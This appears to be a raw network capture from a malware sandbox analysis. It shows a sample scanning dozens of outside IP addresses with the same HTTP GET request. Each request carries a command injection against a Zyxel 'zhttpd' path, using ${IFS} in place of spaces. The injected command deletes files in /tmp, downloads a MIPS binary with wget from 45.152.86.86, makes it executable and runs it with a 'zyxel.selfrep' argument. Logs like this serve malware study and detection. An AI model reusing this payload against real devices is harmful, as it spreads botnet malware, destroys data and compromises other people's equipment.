                                        Mar 31, 2024 09:20:20.150073051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        593192.168.2.2344082113.69.250.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150125027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        594192.168.2.235135481.46.193.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150163889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        595192.168.2.2336710206.111.199.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150218010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        596192.168.2.235456296.120.42.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150263071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        597192.168.2.2344388176.70.36.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150300980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        598192.168.2.234537469.187.86.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150358915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        599192.168.2.2342426207.166.12.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150410891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        600192.168.2.234102249.196.253.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150469065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        601192.168.2.2333534107.76.59.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150509119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        602192.168.2.235113639.127.123.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150556087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        603192.168.2.2336718174.38.19.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150600910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        604192.168.2.2359374142.23.243.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150643110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        605192.168.2.2357386213.142.38.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150680065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        606192.168.2.2340428142.173.59.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150746107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        607192.168.2.235454887.64.177.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150790930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        608192.168.2.2355140136.7.198.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150830030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        609192.168.2.235798649.191.71.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150865078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        610192.168.2.235300447.84.96.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150911093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        611192.168.2.2353338197.84.196.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.150963068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        612192.168.2.234141479.240.76.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151022911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        613192.168.2.2340484120.130.8.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151061058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        614192.168.2.235329051.77.232.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151102066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        615192.168.2.2337932150.226.253.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151154041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        616192.168.2.2339672105.46.176.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151197910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        617192.168.2.2337802130.212.96.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151242018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        618192.168.2.2335550190.225.192.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151298046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        619192.168.2.2360174166.202.108.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151345015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        620192.168.2.2358804126.101.25.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151401043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        621192.168.2.2342080196.104.113.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151452065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        622192.168.2.233985488.246.45.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151495934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        623192.168.2.2342972130.102.128.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151551008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        624192.168.2.2345378104.179.39.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151601076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        625192.168.2.235997690.39.117.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151644945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        626192.168.2.233790463.172.190.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151699066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        627192.168.2.2351382166.84.216.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151738882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        628192.168.2.234978831.107.153.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151778936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        629192.168.2.2334924113.169.87.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151828051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        630192.168.2.23603424.51.254.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151879072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        631192.168.2.2349364206.0.159.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151925087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        632192.168.2.233283269.151.166.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.151983976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        633192.168.2.2356706178.76.225.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152005911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        634192.168.2.2356700167.119.119.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152064085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        635192.168.2.2344870155.35.91.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152098894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        636192.168.2.234672044.180.191.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152142048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        637192.168.2.2352264159.106.244.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152194023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        638192.168.2.2341434104.240.220.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152254105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        639192.168.2.2347224182.4.94.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152296066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        640192.168.2.2359898163.157.225.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152331114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        641192.168.2.2356744133.18.133.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152386904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        642192.168.2.2332848122.106.138.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152443886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        643192.168.2.235564080.89.126.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152471066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        644192.168.2.2339340145.35.83.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152535915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        645192.168.2.2348740205.50.101.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152578115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        646192.168.2.2360728210.140.60.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152636051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        647192.168.2.2345466205.151.195.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152668953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        648192.168.2.2342108187.159.116.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152720928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        649192.168.2.2350060191.75.107.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152760983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        650192.168.2.2354892165.75.179.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152807951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        651192.168.2.235513647.113.237.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152867079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        652192.168.2.235116020.65.250.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152914047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        653192.168.2.2354222116.40.42.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.152975082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        654192.168.2.2344018204.33.241.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153023958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        655192.168.2.2339466144.84.45.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153068066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        656192.168.2.233359853.81.7.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153107882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        657192.168.2.2337680196.61.117.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153158903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        658192.168.2.234008064.9.166.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153187037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        659192.168.2.2339598103.8.250.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:20.153228998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        660192.168.2.235302671.28.32.190443
                                        TimestampBytes transferredDirectionData
